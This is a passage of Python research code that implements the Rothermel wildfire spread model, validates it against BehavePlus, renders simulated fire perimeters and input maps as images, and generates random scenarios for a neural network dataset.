#print("modded ecc:",eccentricity)
backingSpreadRate = forwardSpreadRate * (1.0-eccentricity) / (1.0+eccentricity)
ellipticalB = (forwardSpreadRate + backingSpreadRate) / 2.0
ellipticalC = ellipticalB - backingSpreadRate
if fireLengthToWidthRatio > 1e-7:
ellipticalA = ellipticalB / fireLengthToWidthRatio
else:
ellipticalA = 0.0
return fireLengthToWidthRatio, eccentricity, backingSpreadRate, ellipticalA, ellipticalB, ellipticalC
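# Sketch of the fire-shape relations above (illustrative values): an effective
# wind speed of 4 gives a length-to-width ratio of 1 + 0.25*4 = 2.0 and an
# eccentricity of sqrt(2**2 - 1)/2 ≈ 0.866, from which the backing rate and the
# elliptical semi-axes follow.
def exampleFireDimensions(effectiveWindSpeed=4.0, forwardSpreadRate=10.0):
    return calculateFireBasicDimensions(effectiveWindSpeed, forwardSpreadRate)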
def calculateFireFirelineIntensity(forwardSpreadRate,reactionIntensity,residenceTime):
firelineIntensity = forwardSpreadRate * reactionIntensity * residenceTime / 60.0
return firelineIntensity
def calculateFlameLength(firelineIntensity):
flameLength = max([0.0,0.45*(firelineIntensity**0.46)])
return flameLength
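# Sketch (illustrative value): a fireline intensity of 100 in the units produced
# by calculateFireFirelineIntensity gives a flame length of about
# 0.45 * 100**0.46 ≈ 3.7.
def exampleFlameLength(firelineIntensity=100.0):
    return calculateFlameLength(firelineIntensity)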
def calculateSpreadRateAtVector(forwardSpreadRate,eccentricity,dirRmax,dirOfInterest):
if forwardSpreadRate > 0.0:
beta = abs(dirRmax - dirOfInterest)
#print("%.1f,%.1f,%.1f"%(dirRmax,dirOfInterest,beta))
if beta > 180.0:
beta = (360-beta)
betaRad = beta * 3.1415926535/180.0
dirFactor = ((np.cos(betaRad)+1)/2)
# This is the equation according to the BehavePlus source code:
rosVector = forwardSpreadRate * (1.0-eccentricity) / (1.0-eccentricity* np.cos(betaRad))
# This is the equation I have found to match BehavePlus results:
rosVector = ((1-abs(betaRad)/3.1415926535)*forwardSpreadRate * dirFactor)
# Combining the two smooths out the peak
rosVector = ((1-abs(betaRad)/3.1415926535)*forwardSpreadRate * dirFactor + (abs(betaRad)/3.1415926535)*rosVector)
#eccentricity = 0.9
#rosVector = forwardSpreadRate * (1.0-eccentricity) / (1.0-eccentricity*dirFactor)
#if beta < 30:
#rosVector = ((1-abs(betaRad)/3.1415926535)*forwardSpreadRate * dirFactor + (betaRad/3.1415926535)*rosVector)
#print(dirOfInterest,betaRad,rosVector)
else:
rosVector = 0.0
return rosVector
def calculateSpreadRateAtVector2(forwardSpreadRate,backSpreadRate,eccentricity,dirRmax,dirOfInterest):
if forwardSpreadRate > 0.0:
beta = abs(dirRmax - dirOfInterest)
#print("%.1f,%.1f,%.1f"%(dirRmax,dirOfInterest,beta))
if beta > 180.0:
beta = (360-beta)
if abs(beta) > 0.1:
betaRad = beta * 3.1415926535/180.0
dirFactor = ((np.cos(betaRad)+1)/2)
# This is the equation according to the BehavePlus source code:
rosVector = forwardSpreadRate * (1.0-eccentricity) / (1.0-eccentricity* np.cos(betaRad))
# This is the equation I have found to match BehavePlus results:
#rosVector = ((1-abs(betaRad)/3.1415926535)*forwardSpreadRate * dirFactor)
#rosVector = ((1-abs(betaRad)/3.1415926535)*(forwardSpreadRate-backSpreadRate) * dirFactor)+backSpreadRate
# Combining the two smooths out the peak
#rosVector = ((1-abs(betaRad)/3.1415926535)*forwardSpreadRate * dirFactor + (abs(betaRad)/3.1415926535)*rosVector)
#eccentricity = 0.9
#rosVector = forwardSpreadRate * (1.0-eccentricity) / (1.0-eccentricity*dirFactor)
#if beta < 30:
#rosVector = ((1-abs(betaRad)/3.1415926535)*forwardSpreadRate * dirFactor + (betaRad/3.1415926535)*rosVector)
#print(dirOfInterest,betaRad,rosVector)
else:
rosVector = forwardSpreadRate
if rosVector < backSpreadRate:
rosVector = backSpreadRate
else:
rosVector = 0.0
return rosVector
def scaleRandomValue(mn,mx):
value = np.random.random()*(mx-mn)+mn
return value
def getRandomConditions(params,allowDynamicModels=True):
paramsRand = dict()
for key in params.keys():
if params[key][0] == None:
minValue = params[key][1]
maxValue = params[key][2]
if key == 'model':
fuelModels = list(buildFuelModels(allowDynamicModels=minValue,allowNonBurningModels=maxValue).keys())
value = fuelModels[np.random.randint(0,len(fuelModels))]
else:
value = scaleRandomValue(minValue,maxValue)
else:
value = params[key][0]
paramsRand[key] = value
return paramsRand
def orderParams(params,toPrint=False):
model = params['model']
canopyCover = params['canopyCover']*100
canopyHeight = params['canopyHeight']
crownRatio = params['crownRatio']
m1h = params['m1h']
m10h = params['m10h']
m100h = params['m100h']
lhm = params['lhm']
lwm = params['lwm']
windSpeed = params['windSpeed']
windDir = params['windDir']
slope = params['slope']*100
aspect = params['aspect']
orderedParams = [model,canopyCover,canopyHeight,crownRatio,m1h,m10h,m100h,lhm,lwm,windSpeed,windDir,slope,aspect]
if toPrint:
print("************************************************************")
print("Starting simulation")
print("model:\t\t\t%s"%(model))
print("canopyCover:\t\t%.2f"%(canopyCover))
print("canopyHeight:\t\t%.2f"%(canopyHeight))
print("crownRatio:\t\t%.2f"%(crownRatio))
print("m1h:\t\t\t%.2f"%(m1h))
print("m10h:\t\t\t%.2f"%(m10h))
print("m100h:\t\t\t%.2f"%(m100h))
print("lhm:\t\t\t%.2f"%(lhm))
print("lwm:\t\t\t%.2f"%(lwm))
print("windSpeed:\t\t%.2f"%(windSpeed))
print("windDir:\t\t%.2f"%(windDir))
print("slope:\t\t\t%.2f"%(slope))
print("aspect:\t\t\t%.2f"%(aspect))
return orderedParams
def getROSfromParams(params,toPrint=False,maxOnly=False):
model = params['model']
canopyCover = params['canopyCover']
canopyHeight = params['canopyHeight']
crownRatio = params['crownRatio']
m1h = params['m1h']
m10h = params['m10h']
m100h = params['m100h']
lhm = params['lhm']
lwm = params['lwm']
windSpeed = params['windSpeed']
windDir = params['windDir']
slope = params['slope']
aspect = params['aspect']
orderParams(params,toPrint=toPrint)
directions = np.linspace(0,360,361)
fuelModel = getFuelModel(model)
moistureDead, moistureLive = getMoistureContent(m1h,m10h,m100h,lhm,lwm)
loadDead, loadLive = getFuelLoad(fuelModel,moistureLive)
savrDead, savrLive = getSAV(fuelModel)
deadFraction, liveFraction, deadFractionTotal, liveFractionTotal = getDLFraction(fuelModel,moistureLive)
if toPrint:
print(deadFraction)
print(liveFraction)
moistOfExtDead, moistOfExtLive = getMoistOfExt(fuelModel,moistureDead,moistureLive)
heatDead, heatLive = getHeatOfCombustion(fuelModel)
intermediates = lifeStateIntermediate(fuelModel,moistureDead,moistureLive)
sigma = getCharacteristicSAVR(fuelModel,intermediates,moistureLive)
packingRatio, relativePackingRatio, bulkDensity = getPackingRatios(fuelModel,intermediates,moistureLive)
heatSink = getHeatSink(fuelModel,moistureDead,moistureLive,bulkDensity)
heatFlux = getHeatFlux(fuelModel,moistureDead,moistureLive,sigma,packingRatio)
reactionIntensity, reactionIntensityDead, reactionIntensityLive = getSurfaceFireReactionIntensity(fuelModel,sigma,relativePackingRatio,moistOfExtDead,moistOfExtLive,intermediates)
Rstar = getNoWindNoSlopeSpreadRate(reactionIntensity,heatFlux,heatSink)
mfWindSpeed, waf = calculateMidflameWindSpeed(fuelModel,windSpeed,canopyCover,canopyHeight,crownRatio)
phiW = calculateWindFactor(sigma,relativePackingRatio,mfWindSpeed)
phiS = calculateSlopeFactor(slope,packingRatio)
dirRmax, forwardSpreadRate = calculateDirectionOfMaxSpread(windDir,aspect,Rstar,phiS,phiW)
windSpeedLimit = calculateWindSpeedLimit(reactionIntensity,phiS)
effectiveWindSpeed = calculateEffectiveWindSpeed(forwardSpreadRate,Rstar,relativePackingRatio,sigma,windSpeedLimit=windSpeedLimit)
residenceTime = getResidenceTime(sigma)
#effectiveWindSpeed = 3.9
fireLengthToWidthRatio, eccentricity, backingSpreadRate, eA, eB, eC = calculateFireBasicDimensions(effectiveWindSpeed,forwardSpreadRate)
firelineIntensity = calculateFireFirelineIntensity(forwardSpreadRate,reactionIntensity,residenceTime)
flameLength = calculateFlameLength(firelineIntensity)
rosVectors = []
R = calculateSpreadRateAtVector(forwardSpreadRate,eccentricity,dirRmax,dirRmax)
R = convertFtMinToChHr(R)
if toPrint:
print("************************************************************")
print("Rate of Spread:\t\t\t\t\t%.1f\tch/h"%(R))
print("Reaction Intensity:\t\t\t\t%.0f\tBtu/ft2/min"%(reactionIntensity))
print("Surface Fire Dir of Max Spread (from north):\t%.0f\tdeg"%(dirRmax))
print("Midflame Wind Speed:\t\t\t\t%.1f\tmi/h"%(mfWindSpeed))
print("Wind Adjustment Factor:\t\t\t\t%.2f"%(waf))
print("Effective Wind Speed:\t\t\t\t%.1f\tmi/h"%(effectiveWindSpeed))
print("Live Fuel Moisture of Extinction:\t\t%.0f"%(moistOfExtLive*100))
print("Characteristic SA/V:\t\t\t\t%s\tft2/ft3"%(int(sigma)))
print("Bulk Density:\t\t\t\t\t%.4f\tlbs/ft3"%(bulkDensity))
print("Packing Ratio:\t\t\t\t\t%.4f"%(packingRatio))
print("Relative Packing Ratio:\t\t\t\t%.4f"%(relativePackingRatio))
print("Dead Fuel Reaction Intensity:\t\t\t%.0f\tBtu/ft2/min"%(reactionIntensityDead))
print("Live Fuel Reaction Intensity:\t\t\t%.0f\tBtu/ft2/min"%(reactionIntensityLive))
print("Surface Fire Wind Factor:\t\t\t%.1f"%(phiW))
print("Slope Factor:\t\t\t\t\t%.1f"%(phiS))
print("Heat Source:\t\t\t\t\t%.0f\tBtu/ft2/min"%(heatFlux*reactionIntensity*(1+phiS+phiW)))
print("Heat Sink:\t\t\t\t\t%.1f\tBtu/ft3"%(heatSink))
print("Dead Herbaceous Fuel Load:\t\t\t%.2f\tton/ac"%(loadDead[3]*21.78))
print("Live Fuel Load Remainder:\t\t\t%.2f\tton/ac"%(loadLive[0]*21.78))
print("Total Dead Fuel Load:\t\t\t\t%.2f\tton/ac"%(np.sum(loadDead)*21.78))
print("Total Live Fuel Load:\t\t\t\t%.2f\tton/ac"%(np.sum(loadLive)*21.78))
print("Dead Fuel Load Portion:\t\t\t\t%.2f"%(np.sum(loadDead)/(np.sum(loadDead)+np.sum(loadLive))*100))
print("Live Fuel Load Portion:\t\t\t\t%.2f"%(np.sum(loadLive)/(np.sum(loadDead)+np.sum(loadLive))*100))
print("************************************************************")
if maxOnly:
return dirRmax, R
for dirOfInterest in directions:
rosVector = calculateSpreadRateAtVector2(forwardSpreadRate,backingSpreadRate,eccentricity,dirRmax,dirOfInterest)
rosVector = convertFtMinToChHr(rosVector)
rosVectors.append(rosVector)
rosVectors = np.array(rosVectors)
#R = calculateROS(Rstar, phiW, phiS)
return directions, rosVectors
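# End-to-end usage sketch (illustrative): build the standard parameter
# dictionary defined further below and compute the full rate-of-spread curve.
# directions are degrees from north and rosVectors are in ch/h.
def exampleSpreadCurve():
    params = getStandardParams()
    directions, rosVectors = getROSfromParams(params, toPrint=False)
    return directions, rosVectors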
def cartCoords(thetaRad,rosVectorsKmHr):
coords = np.zeros((len(rosVectorsKmHr),2))
x = -1*np.array(rosVectorsKmHr)*np.sin(thetaRad)
y = -1*np.array(rosVectorsKmHr)*np.cos(thetaRad)
coords[:,0] = x
coords[:,1] = y
return coords
def rothermelOuputToImg(theta,R,resX=50,resY=50):
coords = cartCoords(theta,R.copy())
(coords[:,0],coords[:,1]) = (coords[:,0]+resX/2,coords[:,1]+resY/2)
coords = np.array(coords,dtype=np.int32)
coordsTuple = []
for c in coords:
coordsTuple.append((c[0],c[1]))
img = Image.new('LA',(resX,resY))
draw = ImageDraw.Draw(img)
draw.polygon(coordsTuple,fill='black',outline=None)
img = np.copy(np.asarray(img)[:,:,1])
#img[int(resX/2),int(resY/2)] = 125
return img
def rothermelOuputToImgMulti(theta,Rbase,times,resX=50,resY=50):
img = Image.new('LA',(resX,resY))
draw = ImageDraw.Draw(img)
for t in times:
coords = cartCoords(theta,Rbase.copy()*t)
(coords[:,0],coords[:,1]) = (coords[:,0]+resX/2,coords[:,1]+resY/2)
coords = np.array(coords,dtype=np.int32)
coordsTuple = []
for c in coords:
coordsTuple.append((c[0],c[1]))
draw.polygon(coordsTuple,fill=(t,t),outline=(t,t))
img = np.copy(np.asarray(img)[:,:,1])
#img[int(resX/2),int(resY/2)] = 125
return img
def convertChHrToKmHour(R):
if isinstance(R, list):
# Convert each entry: ch/h -> ft/min -> mi/h -> km/h
R = [r*1.1*(60.0/5280.0)*1.60934 for r in R]
else:
R = R*1.1 # Convert to ft/min
R = R*60.0/5280.0 # Convert to mi/hour
R = R*1.60934 # Convert to km/hour
return R
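# Sketch of the unit chain above (illustrative value): 10 ch/h is 11 ft/min,
# 0.125 mi/h, and roughly 0.20 km/h.
def exampleUnitConversion():
    return convertChHrToKmHour(10.0) # ≈ 0.20 km/h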
def convertDegToRad(theta):
if isinstance(theta, list):
theta = [t*3.1415926535/180.0 for t in theta]
else:
theta = theta*3.1415926535/180.0
return theta
def slopeToElevImg(phi,phiDir,resX=50,resY=50):
phiDirRad = phiDir*3.1415926535/180.0
slopeX = phi*np.sin(phiDirRad)
slopeY = -phi*np.cos(phiDirRad)
img = np.zeros((2,2))
#img[img == 0] = np.nan
img[0,0] = -resX/2*slopeX+resY/2*slopeY
img[0,-1]= resX/2*slopeX+resY/2*slopeY
img[-1,0] = -resX/2*slopeX-resY/2*slopeY
img[-1,-1] = resX/2*slopeX-resY/2*slopeY
img = zoom(img,resX/2,order=1)
return img
def visualizeInputImgs(directions,rosVectors,params,resX=50,resY=50,toPlot=True):
rosVectorsKmHr = convertChHrToKmHour(rosVectors)
directionsRad = convertDegToRad(directions)
x = -1*np.array(rosVectorsKmHr)*np.sin(directionsRad)
y = np.array(rosVectorsKmHr)*np.cos(directionsRad)
img6 = rothermelOuputToImg(directionsRad,rosVectorsKmHr*6.0,resX=resX,resY=resY)
img12 = rothermelOuputToImg(directionsRad,rosVectorsKmHr*12.0,resX=resX,resY=resY)
img18 = rothermelOuputToImg(directionsRad,rosVectorsKmHr*18.0,resX=resX,resY=resY)
img24 = rothermelOuputToImg(directionsRad,rosVectorsKmHr*24.0,resX=resX,resY=resY)
elevImg = slopeToElevImg(params['slope'],params['aspect'],resX=resX,resY=resY)
windDirRad = params['windDir']*3.1415926536/180.0
windX = np.zeros((resX,resY))+params['windSpeed']*np.sin(windDirRad)
windY = np.zeros((resX,resY))-params['windSpeed']*np.cos(windDirRad)
lhmImg = np.zeros((resX,resY))+params['lhm']
lwmImg = np.zeros((resX,resY))+params['lwm']
m1hImg = np.zeros((resX,resY))+params['m1h']
m10hImg = np.zeros((resX,resY))+params['m10h']
m100hImg = np.zeros((resX,resY))+params['m100h']
canopyCoverImg = np.zeros((resX,resY))+params['canopyCover']
canopyHeightImg = np.zeros((resX,resY))+params['canopyHeight']
crownRatioImg = np.zeros((resX,resY))+params['crownRatio']
modelImg = np.zeros((resX,resY))+params['modelInd']
fireImages = [img6,img12,img18,img24]
modelInputs = [elevImg,windX,windY,lhmImg,lwmImg,m1hImg,m10hImg,m100hImg,canopyCoverImg,canopyHeightImg,crownRatioImg,modelImg]
if toPlot:
plt.figure(figsize=(12,12))
plt.suptitle('Fuel Model:%s'%(params['model']))
plt.subplot(4,4,1)
plt.imshow(img12,cmap='jet')
plt.colorbar()
plt.title('Fire at 12 hours')
plt.subplot(4,4,2)
plt.imshow(img24,cmap='jet')
plt.colorbar()
plt.title('Fire at 24 hours')
plt.subplot(4,4,3)
plt.imshow(elevImg,cmap='jet')
plt.colorbar()
plt.title('Elevation')
plt.subplot(4,4,4)
plt.imshow(windX,cmap='jet',vmin=-20,vmax=20)
plt.colorbar()
plt.title('WindX')
plt.subplot(4,4,5)
plt.imshow(windY,cmap='jet',vmin=-20,vmax=20)
plt.colorbar()
plt.title('WindY')
plt.subplot(4,4,6)
plt.imshow(lhmImg,cmap='jet',vmin=30,vmax=150)
plt.colorbar()
plt.title('Live Herbaceous Moisture')
plt.subplot(4,4,7)
plt.imshow(lwmImg,cmap='jet',vmin=30,vmax=150)
plt.colorbar()
plt.title('Live Woody Moisture')
plt.subplot(4,4,8)
plt.imshow(m1hImg,cmap='jet',vmin=0,vmax=40)
plt.colorbar()
plt.title('1-hour Moisture')
plt.subplot(4,4,9)
plt.imshow(canopyCoverImg,cmap='jet',vmin=0,vmax=1)
plt.colorbar()
plt.title('Canopy Cover')
plt.subplot(4,4,10)
plt.imshow(canopyHeightImg,cmap='jet',vmin=1,vmax=20)
plt.colorbar()
plt.title('Canopy Height')
plt.subplot(4,4,11)
plt.imshow(crownRatioImg,cmap='jet',vmin=0,vmax=1)
plt.colorbar()
plt.title('Crown Ratio')
plt.subplot(4,4,12)
plt.imshow(modelImg,cmap='jet',vmin=0,vmax=52)
plt.colorbar()
plt.title('Model')
#plt.plot(x,y)
#plt.plot(0,0,'ok')
#xRange = x.max()-x.min()
#yRange = y.max()-y.min()
#plt.xlim([x.min()-xRange/2,x.max()+xRange/2])
#plt.ylim([y.min()-yRange/2,y.max()+yRange/2])
#plt.title('Rate of Spread')
return fireImages, modelInputs
def visualizeInputValues(directions,rosVectors,params,resX=50,resY=50):
rosVectorsKmHr = convertChHrToKmHour(rosVectors)
directionsRad = convertDegToRad(directions)
x = -1*np.array(rosVectorsKmHr)*np.sin(directionsRad)
y = np.array(rosVectorsKmHr)*np.cos(directionsRad)
imgFire = rothermelOuputToImgMulti(directionsRad,rosVectorsKmHr,[48,42,36,30,24,18,12,6],resX=resX,resY=resY)
imgFire[25,25] = 0
elevImg = slopeToElevImg(params['slope'],params['aspect'],resX=resX,resY=resY)
windDirRad = params['windDir']*3.1415926536/180.0
windSpeed = params['windSpeed']
windX = 1.0*windSpeed*np.sin(windDirRad)
windY = -1.0*windSpeed*np.cos(windDirRad)
windYs = [windX,windY]
windXs = np.arange(len(windYs))
windNames = ('E+','N+')
windLimits = [-20,20]
moistYs = [params['m1h'],params['m10h'],params['m100h'],params['lhm']/5,params['lwm']/5]
moistXs = np.arange(len(moistYs))
moistNames = ('m1h','m10h','m100h','lhm/5','lwm/5')
moistLimits = [0,60]
canopyYs = [params['canopyCover'],params['canopyHeight']/20,params['crownRatio']]
canopyXs = np.arange(len(canopyYs))
canopyNames = ('Cover (%)','Height (ft/20)','Ratio (%)')
canopyLimits = [0,1]
modelYs = [params['modelInd'],0]
modelXs = np.arange(len(modelYs))
modelNames = (str(params['model']),'')
modelLimits = [0,52]
plt.figure(figsize=(10,14))
plt.suptitle('Fuel Model:%s'%(params['model']))
plt.subplot(3,2,1)
plt.imshow(imgFire,cmap='gray_r')
c = plt.colorbar(ticks=[48,36,24,12,0])
plt.title('Fire spread')
plt.xlabel('km')
plt.ylabel('km')
c.ax.set_label('Hours')
#plt.subplot(3,3,2)
#plt.imshow(img24,cmap='jet')
#plt.colorbar()
#plt.title('Fire at 24 hours')
plt.subplot(3,2,3)
plt.imshow(elevImg,cmap='jet')
plt.colorbar()
plt.title('Elevation Difference [km]')
plt.subplot(3,2,4)
plt.bar(windXs,windYs,align='center');
plt.xticks(windXs,windNames);
plt.ylabel('WindSpeed (mph)');
plt.ylim(windLimits)
plt.subplot(3,2,5)
plt.bar(moistXs,moistYs,align='center');
plt.xticks(moistXs,moistNames);
plt.ylabel('Moisture (%)');
plt.ylim(moistLimits)
plt.subplot(3,2,6)
plt.bar(canopyXs,canopyYs,align='center');
plt.xticks(canopyXs,canopyNames);
plt.ylabel('Canopy (%)');
plt.ylim(canopyLimits)
plt.subplot(3,2,2)
plt.bar(modelXs,modelYs,align='center');
plt.xticks(modelXs,modelNames);
plt.ylabel('Model Rank');
plt.ylim(modelLimits)
plt.xlim([-0.95,0.95])
#plt.plot(x,y)
#plt.plot(0,0,'ok')
#xRange = x.max()-x.min()
#yRange = y.max()-y.min()
#plt.xlim([x.min()-xRange/2,x.max()+xRange/2])
#plt.ylim([y.min()-yRange/2,y.max()+yRange/2])
#plt.title('Rate of Spread')
return imgFire
def paramListTodict(paramsRaw):
params = dict()
params['model'] = paramsRaw[0]
params['canopyCover'] = float(paramsRaw[1])/100
params['canopyHeight'] = float(paramsRaw[2])
params['crownRatio'] = float(paramsRaw[3])
params['m1h'] = float(paramsRaw[4])
params['m10h'] = float(paramsRaw[5])
params['m100h'] = float(paramsRaw[6])
params['lhm'] = float(paramsRaw[7])
params['lwm'] = float(paramsRaw[8])
params['windSpeed'] = float(paramsRaw[9])
params['windDir'] = float(paramsRaw[10])
params['slope'] = float(paramsRaw[11])/100
params['aspect'] = float(paramsRaw[12])
return params
def getStandardParams():
# model,canopyCover/100,Height,Ratio,m1h,m10h,m100h,lhm,l2m,windSpeed,windDir,slope,aspect
#paramList = ['FM1',0,0,0.5,8,6,4,60,60,10,0,0.5,0]
paramList = ['FM1',0,0,0.5,8,9,10,60,60,10,0,0.5,0]
params = paramListTodict(paramList)
return params
def determineFastestModel(params=None,toPrint=False):
if params is None:
params = getStandardParams()
fuelModels = buildFuelModels(allowDynamicModels=True,allowNonBurningModels=True)
updatedModels = []
Rs = []
for fuelModel in list(fuelModels.keys()):
params['model'] = fuelModel
direction, R = getROSfromParams(params,maxOnly=True)
updatedModels.append(fuelModel)
Rs.append(R)
numZero = len(np.where(np.array(Rs) <= 0.01)[0])
inds = np.argsort(Rs)
updatedModelsSort = np.array(updatedModels)[inds]
RsSort = np.sort(Rs)
modelIndexDict = dict()
for i in range(0,len(inds)):
value = max(0,i-numZero+1)
modelIndexDict[updatedModelsSort[i]] = value
if toPrint:
print("Model = %s,\tR = %.2f"%(updatedModelsSort[i],RsSort[i]))
return modelIndexDict
def rearrangeDatas(datas):
sz = datas[0].shape
szrs = sz[0]*sz[1]
datasNew = np.zeros((szrs*len(datas),))
for i in range(0,len(datas)):
datasNew[i*szrs:(i+1)*szrs] = np.reshape(datas[i],(szrs,))
return datasNew
def getStandardParamsInput():
paramsInput = dict()
paramsInput['model'] = [None,True,False] # string
paramsInput['canopyCover'] = [None,0.0,1.0] # percent (0-1)
paramsInput['canopyHeight'] = [None,1.0,20.0] # ft (1-20)
paramsInput['crownRatio'] = [None,0.1,1.0] # fraction (0.1-1)
paramsInput['m1h'] = [None,1.0,40.0] # percent (1-60)
paramsInput['m10h'] = [None,1.0,40.0] # percent (1-60)
paramsInput['m100h'] = [None,1.0,40.0] # percent (1-60)
paramsInput['lhm'] = [None,30.0,100.0] # percent (30-300)
paramsInput['lwm'] = [None,30.0,100.0] # percent (30-300)
paramsInput['windSpeed'] = [None,0.0,30.0] # mph (0-30)
paramsInput['windDir'] = [None,0.0,360.0] # degrees (0-360)
paramsInput['slope'] = [None,0.0,1.0] # fraction (0-1)
paramsInput['aspect'] = [None,0.0,360.0] # degrees (0-360)
paramsInput['Mth'] = [None,5,9] # integer
paramsInput['Day'] = [None,0,31] # integer
paramsInput['Pcp'] = [None,0.3,10.9] # mm
paramsInput['mTH'] = [None,400,600] # 24-Hour
paramsInput['xTH'] = [None,1200,1500] # 24-Hour
paramsInput['mT'] = [None,2.0,16.6] # degrees C
paramsInput['xT'] = [None,28.9,37.2] # degrees C
paramsInput['mH'] = [None,39.2,50.0] # Percent
paramsInput['xH'] = [None,39.2,50.0] # Percent
paramsInput['PST'] = [None,0,2400] # Precipitation Start Time
paramsInput['PET'] = [None,0,2400] # Precipitation End Time
paramsInput['startTime'] = [None,0,24] # Fire start hour
return paramsInput
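# Usage sketch (illustrative): each entry above is [fixedValue, minValue,
# maxValue]; leaving fixedValue as None makes getRandomConditions sample
# uniformly between the bounds (or pick a random fuel-model key for 'model').
def exampleRandomScenario():
    paramsInput = getStandardParamsInput()
    return getRandomConditions(paramsInput)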
def manyFiresInputFigure(modelInputs):
fig, ax = plt.subplots(figsize=(8,8))
a = []
lims = [[-30,30],[-20,20],[-20,20],[30,150],[30,150],[0,30],[0,30],[0,30],[0,1],[0,20],[0,1],[0,53]]
names = ['Elevation','East Wind','North Wind','Live Herbaceous Moisture','Live Woody Moisture','1-Hour Moisture','10-Hour Moisture','100-Hour Moisture','Canopy Cover','Canopy Height','Crown Ratio','Fuel Model']
textOffset = [0]
#modelInputs = [elevImg,windX,windY,lhmImg,lwmImg,m1hImg,m10hImg,m100hImg,canopyCoverImg,canopyHeightImg,crownRatioImg,modelImg]
for i in range(len(modelInputs)-1,-1,-1):
img = modelInputs[i].copy()
img[-1,-1] = lims[i][0]
img[-1,-2] = lims[i][1]
oi = OffsetImage(img, zoom = 2.0, cmap='jet')
box = AnnotationBbox(oi, (-0.5*i,1*i), frameon=True)
a.append(ax.add_artist(box))
ax.annotate(names[i],xy=(-0.5*i-1.1,1*i-0.9),xycoords='data',textcoords='data',xytext=(-0.5*i-4-(len(names[i])-10)*0.1,1*i-0.85),arrowprops=dict(facecolor='black',shrink=0.05))
i = -1
# Note: imgFire is not an argument here; this relies on a module-level imgFire
# (e.g. produced by visualizeInputValues) being defined before this call.
oi = OffsetImage(imgFire, zoom = 2.0, cmap='jet')
box = AnnotationBbox(oi, (-0.5*i,1*i), frameon=True)
ax.annotate('Fire Perimeter',xy=(-0.5*i-1.1,1*i-0.9),xycoords='data',textcoords='data',xytext=(-0.5*i-4,1*i-0.85),arrowprops=dict(facecolor='black',shrink=0.05))
a.append(ax.add_artist(box))
plt.xlim(-2,6.15)
plt.ylim(-1.9,12.2)
plt.xlim(-9.0,1.4)
#plt.ylim(-50,50)
plt.axis('off')
plt.tight_layout()
plt.savefig('..%soutputs%sinputsExampleManyFires.png'%(os.sep, os.sep),dpi=300)
def makeFirePerimetersFigure(imgFire):
import skimage.transform as sktf
import skimage.filters as skfi
from mpl_toolkits.axes_grid1 import make_axes_locatable
oi = skfi.gaussian(imgFire,sigma=1.0,preserve_range=True)
# Note: directions, rosVectors, and params are read from module scope here,
# and the smoothed array oi above is not used further.
imgFire = visualizeInputValues(directions,rosVectors,params,resX=250,resY=250)
imgFire[125:126,125:126] = 0
imgFire = imgFire[25:175,100:]
imgFire = imgFire[::-1,:]
#oi = OffsetImage(imgFire, zoom = 2.0, cmap='jet')
plt.figure(figsize=(12,12))
ax = plt.gca()
fs=32
im = ax.imshow(imgFire,cmap='hot_r')
plt.gca().invert_yaxis()
plt.xlabel('km',fontsize=fs)
plt.ylabel('km',fontsize=fs)
plt.tick_params(labelsize=fs)
plt.xticks([0,20,40,60,80,100,120,140])
plt.yticks([0,20,40,60,80,100,120,140])
divider = make_axes_locatable(ax)
cax = divider.append_axes("right",size="5%", pad=0.05)
c = plt.colorbar(im,ticks=[48,36,24,12,0],cax=cax)
#plt.title('Fire spread')
plt.tick_params(labelsize=fs)
plt.ylabel('Hours',fontsize=fs)
#c.ax.set_label(fontsize=fs)
plt.tight_layout()
plt.savefig('..%soutputs%sexampleFirePerimiter.eps'%(os.sep, os.sep))
if __name__ == "__main__":
''' case0: Generate 1 set of random inputs and visualize the results.
case1: Generate a set of random inputs and save them for validation
with behavePlus.
case2: Re-generate predictions with the same random inputs.
case3: Re-generate a single validation output.
case4: Generate validation plots.
case5: Generate the neural network dataset.
case6: Combine previously pickled neural network datasets.
case7: Generate the network input/output summary figure.
'''
case = 5
paramsInput = dict()
paramsInput['model'] = [None,True,False] # string
paramsInput['canopyCover'] = [None,0.0,1.0] # percent (0-1)
paramsInput['canopyHeight'] = [None,1.0,20.0] # ft (1-20)
paramsInput['crownRatio'] = [None,0.1,1.0] # fraction (0.1-1)
paramsInput['m1h'] = [None,1.0,40.0] # percent (1-60)
paramsInput['m10h'] = [None,1.0,40.0] # percent (1-60)
paramsInput['m100h'] = [None,1.0,40.0] # percent (1-60)
paramsInput['lhm'] = [None,30.0,100.0] # percent (30-300)
paramsInput['lwm'] = [None,30.0,100.0] # percent (30-300)
paramsInput['windSpeed'] = [None,0.0,30.0] # mph (0-30)
paramsInput['windDir'] = [None,0.0,360.0] # degrees (0-360)
paramsInput['slope'] = [None,0.0,1.0] # fraction (0-1)
paramsInput['aspect'] = [None,0.0,360.0] # degrees (0-360)
paramsInput['Tmin'] = [None,2.0,16.6] # degrees C
paramsInput['Tmax'] = [None,28.9,37.2] # degrees C
resX = 50
resY = 50
"""
"""
#params['m1h'] = 40.0
#params['windSpeed'] = 0.0 # mph (0-30)
#params['windDir'] = -135.0 # degrees (0-360)
#params['slope'] = 0.0 # fraction (0-1)
#params['aspect'] = 135
if case == 0:
params = getRandomConditions(paramsInput,allowDynamicModels=True)
params['model'] = 'TU2'
params['canopyCover'] = 0.0607 # percent (0-1)
params['canopyHeight'] = 17.46 # ft (1-20)
params['crownRatio'] = 0.99 # fraction (0-1)
params['m1h'] = 8.4 # percent (1-100)
params['m10h'] = 6 # percent (1-100)
params['m100h'] = 4 # percent (1-100)
params['lhm'] = 82.75 # percent (30-300)
params['lwm'] = 75.98 # percent (30-300)
params['windSpeed'] = 12.08 # mph (0-30)
params['windDir'] = 223.57 # degrees (0-360)
params['slope'] = 0.9942 # fraction (0-1)
params['aspect'] = 248.29 # degrees (0-360)
directions, rosVectors = getROSfromParams(params,toPrint=True)
visualizeInputImgs(directions,rosVectors,params,resX=resX,resY=resY)
visualizeInputValues(directions,rosVectors,params,resX=resX,resY=resY)
elif case == 1:
allParams = []
allDirections = []
allRosVectors = []
for i in range(0,1000):
params = getRandomConditions(paramsInput,allowDynamicModels=True)
directions, rosVectors = getROSfromParams(params)
allParams.append(orderParams(params))
allDirections.append(directions)
allRosVectors.append(rosVectors)
allParams = np.array(allParams).T
#pd.DataFrame(allParams[1:,:],columns=allParams[0,:]).astype(float).round(2).to_csv('../rothermelData/validationInputs.csv')
#pd.DataFrame(allDirections).T.to_csv('../rothermelData/validationDirections.csv')
#pd.DataFrame(allRosVectors).T.to_csv('../rothermelData/validationRosVectors.csv')
elif case == 2:
allParams = pd.read_csv('../rothermelData/validationInputs.csv')
allDirections = []
